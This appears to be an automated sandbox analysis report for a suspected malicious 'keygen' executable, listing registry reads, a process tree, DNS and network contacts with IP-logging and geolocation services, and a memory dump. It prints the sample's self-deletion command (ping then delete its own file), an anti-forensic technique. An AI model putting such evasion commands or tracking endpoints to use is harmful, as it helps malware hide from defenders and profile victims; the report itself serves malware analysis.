Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 102.9.200.195.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/4156-0-0x0000000002A70000-0x0000000002A88000-memory.dmp